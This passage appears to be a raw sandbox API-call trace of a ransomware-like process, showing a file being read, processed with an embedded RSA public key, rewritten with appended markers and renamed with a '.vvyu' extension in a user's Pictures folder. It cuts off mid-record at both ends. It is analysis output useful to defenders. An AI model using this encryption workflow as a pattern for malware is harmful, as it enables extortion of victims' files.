returned 0x0 [0201.616] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x12d7d, lpOverlapped=0x0) returned 1 [0201.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.618] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c278) returned 1 [0201.619] CryptCreateHash (in: hProv=0x67c278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.619] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.619] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.619] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.619] GetLastError () returned 0x0 [0201.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.620] GetLastError () returned 0x0 [0201.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.620] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.620] CryptReleaseContext (hProv=0x67c278, dwFlags=0x0) returned 1 [0201.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.621] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.621] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.621] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12d80) returned 0x2ea99b0 [0201.622] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fed0 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8ff18 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.623] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3500 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea34e8 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.627] GetCurrentThreadId () returned 0x66c [0201.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8aa8 [0201.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.628] GetCurrentThreadId () returned 0x66c [0201.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3500 [0201.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3560 [0201.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0201.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3578 [0201.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3518 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34e8 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0201.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8ff18 | out: hHeap=0x620000) returned 1 [0201.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.640] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x12d78, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x12d78, lpOverlapped=0x0) returned 1 [0201.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.641] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x12d7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.641] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.642] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.643] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.643] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.643] CloseHandle (hObject=0x510) returned 1 [0201.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0201.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.651] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\XUdJWURucyLo9.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\xudjwurucylo9.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\XUdJWURucyLo9.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\xudjwurucylo9.bmp.vvyu")) returned 1 [0201.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.653] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0201.655] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9dc0ee0, ftCreationTime.dwHighDateTime=0x1d8a47f, ftLastAccessTime.dwLowDateTime=0xdf5fd9b0, ftLastAccessTime.dwHighDateTime=0x1d8a68d, ftLastWriteTime.dwLowDateTime=0xdf5fd9b0, 